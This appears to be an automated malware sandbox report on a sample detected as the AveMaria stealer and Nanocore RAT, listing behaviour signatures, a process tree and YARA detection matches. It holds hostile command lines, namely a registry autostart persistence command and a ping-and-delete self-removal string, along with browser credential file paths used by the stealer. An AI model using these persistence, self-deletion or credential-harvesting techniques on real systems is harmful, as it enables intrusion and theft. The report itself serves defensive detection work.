Play interactive tour

Edit tour

Windows Analysis Report Xjf4yH9N2t.exe

Overview

General Information

Sample Name:	Xjf4yH9N2t.exe
Analysis ID:	457791
MD5:	2318b60075e442cb6141535e268e4df0
SHA1:	6d2e6e0bfdb0e649e0079533ecdbe302ff9dc8b5
SHA256:	cdbe67339a29bfe3066a18b4e68e9b19e28e449ab21ce23a85ed15e04c5255df
Tags:	AveMariaRATexeRAT
Infos:
Most interesting Screenshot:

Detection

Nanocore AveMaria

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Nanocore Rat

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AveMaria stealer

Yara detected Nanocore RAT

Allocates memory in foreign processes

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide user accounts

Contains functionality to inject threads in other processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal e-mail passwords

Creates a thread in another existing process (thread injection)

Creates an undocumented autostart registry key

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides user accounts

Increases the number of concurrent connection per server for Internet Explorer

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Uses dynamic DNS services

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to create new users

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Direct Autorun Keys Modification

Spawns drivers

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Xjf4yH9N2t.exe (PID: 1048 cmdline: 'C:\Users\user\Desktop\Xjf4yH9N2t.exe' MD5: 2318B60075E442CB6141535E268E4DF0)

Xjf4yH9N2t.exe (PID: 3468 cmdline: C:\Users\user\Desktop\Xjf4yH9N2t.exe MD5: 2318B60075E442CB6141535E268E4DF0)

Xjf4yH9N2t.exe (PID: 4092 cmdline: C:\Users\user\Desktop\Xjf4yH9N2t.exe MD5: 2318B60075E442CB6141535E268E4DF0)

Xjf4yH9N2t.exe (PID: 1380 cmdline: C:\Users\user\Desktop\Xjf4yH9N2t.exe MD5: 2318B60075E442CB6141535E268E4DF0)

cmd.exe (PID: 5376 cmdline: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 4600 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: CEE2A7E57DF2A159A065A34913A055C2)

images.exe (PID: 2100 cmdline: C:\ProgramData\images.exe MD5: 2318B60075E442CB6141535E268E4DF0)

images.exe (PID: 2044 cmdline: C:\ProgramData\images.exe MD5: 2318B60075E442CB6141535E268E4DF0)

cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

KetqqsbuJ.exe (PID: 380 cmdline: 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)

KetqqsbuJ.exe (PID: 5916 cmdline: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)

rdpvideominiport.sys (PID: 4 cmdline: MD5: 0600DF60EF88FD10663EC84709E5E245)

rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)

tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)

dhcpmon.exe (PID: 2296 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b0b:$x1: NanoCore.ClientPluginHost 0x5b44:$x2: IClientNetworkHost
00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b0b:$x2: NanoCore.ClientPluginHost 0x5c0f:$s4: PipeCreated 0x5b25:$s5: IClientLoggingHost
00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
00000028.00000002.480758507.0000000003F8D000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x55a47:$a: NanoCore 0x55b31:$a: NanoCore 0x569a8:$a: NanoCore 0x5fb52:$a: NanoCore 0x5fbb3:$a: NanoCore 0x5fbf6:$a: NanoCore 0x5fc36:$a: NanoCore 0x5fe72:$a: NanoCore 0x5ff12:$a: NanoCore 0x606ea:$a: NanoCore 0x60cdd:$a: NanoCore 0x60e2e:$a: NanoCore 0x61c88:$a: NanoCore 0x61eef:$a: NanoCore 0x61f04:$a: NanoCore 0x61f23:$a: NanoCore 0x6ae26:$a: NanoCore 0x6ae4f:$a: NanoCore 0x76bc8:$a: NanoCore 0x76bf1:$a: NanoCore 0x9bab4:$a: NanoCore
00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x20c66:$a: NanoCore 0x20c8b:$a: NanoCore 0x20ce4:$a: NanoCore 0x30ecb:$a: NanoCore 0x30ef1:$a: NanoCore 0x30f4d:$a: NanoCore 0x3dde7:$a: NanoCore 0x3de40:$a: NanoCore 0x3de73:$a: NanoCore 0x3e09f:$a: NanoCore 0x3e11b:$a: NanoCore 0x3e734:$a: NanoCore 0x3e87d:$a: NanoCore 0x3ed51:$a: NanoCore 0x3f038:$a: NanoCore 0x3f04f:$a: NanoCore 0x47f33:$a: NanoCore 0x47faf:$a: NanoCore 0x4a892:$a: NanoCore 0x4fe9d:$a: NanoCore 0x4ff17:$a: NanoCore
00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x36d:$a: NanoCore 0x396:$a: NanoCore 0xc111:$a: NanoCore 0xc13a:$a: NanoCore 0x30fff:$a: NanoCore 0x31017:$a: NanoCore 0x31040:$a: NanoCore 0x40445:$a: NanoCore 0x4045d:$a: NanoCore 0x40482:$a: NanoCore 0x496a1:$a: NanoCore 0x496fa:$a: NanoCore 0x49737:$a: NanoCore 0x497b0:$a: NanoCore 0x5ce5b:$a: NanoCore 0x5ce70:$a: NanoCore 0x5cea5:$a: NanoCore 0x6aaba:$a: NanoCore 0x6aadf:$a: NanoCore 0x6ab38:$a: NanoCore 0x7acd5:$a: NanoCore
Process Memory Space: images.exe PID: 2044	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: KetqqsbuJ.exe PID: 5916	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xde9f:$x1: NanoCore.ClientPluginHost 0x1a860:$x1: NanoCore.ClientPluginHost 0x401c5:$x1: NanoCore.ClientPluginHost 0x49039:$x1: NanoCore.ClientPluginHost 0x5780b:$x1: NanoCore.ClientPluginHost 0xab267:$x1: NanoCore.ClientPluginHost 0x141212:$x1: NanoCore.ClientPluginHost 0x184a91:$x1: NanoCore.ClientPluginHost 0x1d154d:$x1: NanoCore.ClientPluginHost 0x1db9c4:$x1: NanoCore.ClientPluginHost 0x1effe2:$x1: NanoCore.ClientPluginHost 0x1f7186:$x1: NanoCore.ClientPluginHost 0x1fbfe1:$x1: NanoCore.ClientPluginHost 0x2087bb:$x1: NanoCore.ClientPluginHost 0x22415b:$x1: NanoCore.ClientPluginHost 0x232b16:$x1: NanoCore.ClientPluginHost 0x262c5e:$x1: NanoCore.ClientPluginHost 0x26d578:$x1: NanoCore.ClientPluginHost 0x2800f4:$x1: NanoCore.ClientPluginHost 0x283144:$x1: NanoCore.ClientPluginHost 0x2884f8:$x1: NanoCore.ClientPluginHost
Process Memory Space: KetqqsbuJ.exe PID: 5916	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: KetqqsbuJ.exe PID: 5916	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xde10:$a: NanoCore 0xde9f:$a: NanoCore 0xe063:$a: NanoCore 0x1a81f:$a: NanoCore 0x1a860:$a: NanoCore 0x1dcb5:$a: NanoCore 0x1dcdc:$a: NanoCore 0x401c5:$a: NanoCore 0x40293:$a: NanoCore 0x418f6:$a: NanoCore 0x41969:$a: NanoCore 0x48ad7:$a: NanoCore 0x48b80:$a: NanoCore 0x48bfb:$a: NanoCore 0x48c67:$a: NanoCore 0x49039:$a: NanoCore 0x4915d:$a: NanoCore 0x49f64:$a: NanoCore 0x4aaa5:$a: NanoCore 0x4ac92:$a: NanoCore 0x4ace9:$a: NanoCore
Click to see the 59 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
40.2.KetqqsbuJ.exe.6c50000.31.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c50000.31.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3d99:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c70000.32.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.60a0000.24.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3cb81d4.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.5264629.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.5264629.19.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.5264629.19.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.5260000.20.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.5260000.20.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.5260000.20.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.images.exe.400000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
22.2.images.exe.400000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
22.2.images.exe.400000.2.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
22.2.images.exe.400000.2.unpack	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6cc0000.36.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.5260000.20.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.5260000.20.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.5260000.20.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3d08a28.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x2840f:$x1: NanoCore.ClientPluginHost 0x3784f:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost 0x28429:$x2: IClientNetworkHost 0x3788c:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x2840f:$x2: NanoCore.ClientPluginHost 0x3784f:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x2b74c:$s4: PipeCreated 0x3aca2:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost 0x283fc:$s5: IClientLoggingHost 0x37879:$s5: IClientLoggingHost
